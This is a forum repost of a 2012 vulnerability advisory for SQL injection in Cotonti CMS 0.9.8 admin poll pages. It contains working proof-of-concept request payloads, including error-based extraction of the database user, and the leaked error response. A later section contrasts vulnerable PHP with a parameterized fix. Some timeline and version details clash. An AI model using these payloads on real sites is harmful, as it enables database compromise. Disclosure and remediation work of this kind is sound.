Thread: SQL Injection in Cotonti 0.9.8


    # Exploit Title: SQL Injection in Cotonti CMS 0.9.8
    # Date: 10/04/2012
    # Author: vekt0r
    # Software: Cotonti CMS 0.9.8
    # Version: v3.5.1
    # Tested on: Windows XP, XAMPP

    Application Info:
    Cotonti combines the flexibility of a web framework with the rapid deployability and featureset of a content management system. Despite having features such as user accounts, content creation, file management and community tools out of the box, it can be easily extended using modules or plugins. Cotonti is powered by its own template engine which is both fast and easy to learn, even if you are not an experienced programmer.

    Vulnerability Details:
    The poll_id parameter in the admin area is vulnerable to SQL injection. The page can be used to inject various injection strings to attack the underlying database. The same issue was also found in the id parameter of the Bump Poll functionality in the admin area.

    Code:
    #####################################

    SQL injection 1
    POC - Throw SQL error
    x=e4b7f5c5a74f45a4&poll_id=16'&poll_text=test&poll_option[id31]=test&poll_option[id32]=test&poll_option[]=&poll_multiple=0&poll_state=0&poll_reset=0&poll_delete=0

    POC - Error-Based

    x=e4b7f5c5a74f45a4&poll_id=16 AND (SELECT 1583 FROM(SELECT COUNT(*),CONCAT(CHAR(58,120,115,120,58),(MID((IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32))),1,50)),CHAR(58,122,112,103,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&poll_text=test&poll_option[id31]=test'&poll_option[id32]=test&poll_option[]=&poll_multiple=0&poll_state=0&poll_reset=0&poll_delete=0

    Response:
    <h2 class="warning">Fatal error</h2><div class="warning">
    <p><em>2012-04-05 14:42</em></p><p>SQL error 23000: Integrity constraint violation: 1062 Duplicate entry ':xsx:root@localhost:zpg:1' for key 'group_key'</p><pre style="overflow:auto">#0 cot_diefatal(SQL error 23000: Integrity constraint violation: 1062 Duplicate entry ':xsx:root@localhost:zpg:1' for key 'group_key')

    SQL injection 2
    ID Parameter
    GET /cotonti-update/admin.php?m=polls&a=bump&id=125'&x=8f768a8788d1ef2f


    Timeline:
    05-04-2012 Vulnerability discovered
    05-04-2011 Vendor notified; additional instances discovered. Vendor fix implemented in latest branch (https://github.com/Cotonti/Cotonti/zipball/master)
    10-04-2012 Public disclosure
    Last edited by vekt0r; 10th April 2012 at 15:28.
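For readers fixing this class of bug in their own code: the pair below is an added illustration, not Cotonti's source or its patch. It shows the pattern that makes the `poll_id` PoC above work (the parameter is concatenated into the query text) next to the corrected handler, which validates the ID as an integer and binds it as a prepared-statement parameter so a value like `16'` can never alter the SQL. The `$pdo` connection, the `cot_polls` table and column names are assumptions for the example.

```php
<?php
// Added example (not Cotonti code). Assumes a PDO connection to MySQL with
// PDO::ATTR_EMULATE_PREPARES set to false so parameters are bound server-side.

// Vulnerable form: poll_id from the request goes straight into the SQL string,
// so "16'" breaks the statement and "16 AND (SELECT ...)" is executed as SQL.
function load_poll_vulnerable(PDO $pdo, array $request): ?array
{
    $poll_id = $request['poll_id'] ?? '';
    $sql = "SELECT * FROM cot_polls WHERE poll_id = '" . $poll_id . "'";
    $row = $pdo->query($sql)->fetch(PDO::FETCH_ASSOC);
    return $row ?: null;
}

// Fixed form: validate the type first, then bind the value as a parameter.
function load_poll_fixed(PDO $pdo, array $request): ?array
{
    // Poll IDs are positive integers; anything else is rejected before it
    // reaches the database layer (this alone stops the "16'" PoC).
    $poll_id = filter_var($request['poll_id'] ?? null, FILTER_VALIDATE_INT);
    if ($poll_id === false || $poll_id < 1) {
        throw new InvalidArgumentException('poll_id must be a positive integer');
    }

    try {
        // The value travels separately from the query text, so it cannot
        // change the statement's structure even if validation were bypassed.
        $stmt = $pdo->prepare('SELECT * FROM cot_polls WHERE poll_id = :id');
        $stmt->bindValue(':id', $poll_id, PDO::PARAM_INT);
        $stmt->execute();
        $row = $stmt->fetch(PDO::FETCH_ASSOC);
        return $row ?: null;
    } catch (PDOException $e) {
        // Log the driver message server-side only. Echoing it to the client,
        // as the "Fatal error" response above does, is what turns a simple
        // failure into an error-based data extraction channel.
        error_log('poll lookup failed: ' . $e->getMessage());
        throw new RuntimeException('Poll lookup failed');
    }
}
```

The same two changes apply to the Bump Poll `id` parameter: cast it with `FILTER_VALIDATE_INT` and bind it with `PDO::PARAM_INT` rather than interpolating it into the `UPDATE`.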
